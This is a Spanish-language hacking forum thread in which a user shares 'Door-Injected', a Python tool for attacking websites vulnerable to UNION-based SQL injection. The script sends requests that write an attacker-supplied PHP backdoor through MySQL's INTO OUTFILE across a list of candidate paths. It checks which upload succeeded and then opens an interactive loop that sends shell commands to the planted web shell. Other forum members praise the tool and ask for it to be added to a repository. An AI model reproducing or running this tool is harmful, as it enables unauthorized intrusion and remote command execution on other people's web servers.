comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Door-Injected

  • 3 Respuestas
  • 1462 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 206
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« en: Febrero 11, 2013, 10:51:18 pm »
Les dejo un pequeño script  que programe en python, sirve para atuomatizar el proceso de inyeccion de codigo a travez una mysqli cuando contamos con un usuario que posee privilegios de FILE en la db, por el momento solo trabaja con inyecciones UNION,  se le puede pasar un fichero como entrada para que dicha herramienta comienze a realizar el proceso en cada path buscando una ruta con permisos de escritura, tendremos que generar nuestro propio payload como asi mismo indicar la columna a utilizar para lograr ingresar el backdoor, con respecto a su uso y funcionalidad pueden mirar el video a continuacion. La tool se encuentra en fase beta, por lo que proximamente se le agregaran mas opciones asi como otras tecnicas de inyeccion.

Código: Python
  1. #!/usr/bin/env python
  2.  
  3. # Door-Injected
  4. # Developed by [Q]3rV[0]
  5.  
  6.  
  7. import httplib, sys, os, time, urllib2, urllib, random
  8.  
  9. banner="""
  10. ________                                  .___            __               __             .___
  11. \______ \  ____   ___________            |   | ____     |__| ____   _____/  |_  ____   __| _/
  12. |    |  \ /  _ \ /  _ \_  __ \  ______  |   |/    \   |  |/ __ \_/ ___\  __\/ __ \ / __ |
  13. |    `   (  <_> |  <_> )  | \/  /_____/  |   |   |  \  |  \ ___/\ \___|  | \ ___// /_/ |
  14. /_______  /\____/ \____/|__|              |___|___|  /\__|  |\___  >\___  >__|  \___  >____ |
  15.        \/                                         \/\______|    \/     \/          \/     \/
  16.  
  17. - Door-Injected V1.0 Beta
  18. - Autor:[Q]3rV[0]
  19. - Mail:a.denegado[0x40]gmail[0x2e]com                      
  20. - Blog:http://underterminal.nixiweb.com
  21. - Saludos: Underc0de TEAM """
  22.  
  23. if sys.platform=="linux" or sys.platform=="linux2":
  24.     os.system('clear')
  25. else:
  26.     os.system('cls')
  27.  
  28. if len(sys.argv)!=3:
  29.     print banner
  30.     print "\n[*] Modo de uso: "+sys.argv[0]+" <host> <fichero>"
  31.     sys.exit(1)
  32.  
  33.  
  34. def connect(host):
  35.     return httplib.HTTPConnection(host)
  36.    
  37. def inyect(host, name):
  38.     fichero=open(sys.argv[2], "r")
  39.     for ruta in fichero:
  40.         ruta=ruta.replace("\n", "")
  41.         connect(host).request("GET", "/"+path+"%20"+vector+"%20into%20outfile%20%27"+directorio+ruta+name+"%27--")
  42.  
  43.  
  44. def buscar(host, name):
  45.     fichero=open(sys.argv[2], "r")
  46.     for ruta in fichero:
  47.         ruta=ruta.replace("\n", "")
  48.         search=connect(host)
  49.         search.request("GET", ruta+name)
  50.         respuesta=search.getresponse()
  51.         if respuesta.status==200:
  52.             print "\n[*] Door-Injected in ------> http://"+host+ruta+name
  53.         else:
  54.             print "\n[X] "+ruta+" ------> Imposible escribir!"
  55.            
  56.  
  57.  
  58. def command(shell):
  59.     agent={"User-Agent": "Door-Injected"}
  60.     metodo=raw_input("\n[*] Metodo [get/post]:")
  61.     parametro=raw_input("\n[*] Ingrese el parametro:")  
  62.     if metodo=="get":
  63.         while 1:
  64.             command=raw_input("\n[*] Door@Injected-$ ")
  65.             data=urllib.urlencode({parametro: command})
  66.             cabeceras=urllib2.Request(shell+"?"+data, headers=agent)
  67.             print urllib2.urlopen(cabeceras).read()
  68.     elif metodo=="post":
  69.         while 1:
  70.             command=raw_input("\n[*] Door@Injected-$ ")
  71.             cabeceras=urllib2.Request(shell, data, headers=agent)
  72.             print urllib2.urlopen(cabeceras).read()
  73.     else:
  74.         print "[ABORT]"
  75.         sys.exit(1)
  76.  
  77. try:
  78.     print banner
  79.     target=sys.argv[1]
  80.     path=target.replace("http://", "").split('/',1)[1]
  81.     host=target.replace("http://", "").split('/')[0]
  82.     directorio=raw_input("\n[*] Path Web: ")
  83.     vector=raw_input("\n[*] /"+path+" ")
  84.     vector=vector.replace(" ", "%20")
  85.     name="DoorI"+str(random.randint(1,1000))+".php"
  86.     print "\n[*] Inyectando en paths..."
  87.     time.sleep(2)
  88.     inyect(host, name)
  89.     print "\n[*] Comprobando shell dump..."
  90.     time.sleep(2)
  91.     print "\n+-------------------------------------------------------------------------------------+"
  92.     buscar(host, name)
  93.     print "\n+-------------------------------------------------------------------------------------+"
  94.     opcion=raw_input("\n[*] Desea ejecutar la shell ahora? [y/n]:")
  95.     if opcion=="y":
  96.         shell=raw_input("\n[*] Ingrese la ruta de la shell:")
  97.         command(shell)
  98.     elif opcion=="n":
  99.         sys.exit(1)
  100.     else:
  101.         print "[ABORT]"
  102.         sys.exit(1)
  103. except(KeyboardInterrupt,SystemExit):
  104.     pass
  105.        
  106.    
  107.    




Web: You are not allowed to view links. Register or Login

Twitter: You are not allowed to view links. Register or Login

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #1 en: Febrero 12, 2013, 03:57:56 pm »
Nice
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 531
  • Actividad:
    8.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #2 en: Febrero 12, 2013, 04:17:34 pm »
excelente aporte

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5325
  • Actividad:
    51.67%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Febrero 21, 2013, 10:55:30 am »
Al repo!!
Excelente aporte!


 

¿Te gustó el post? COMPARTILO!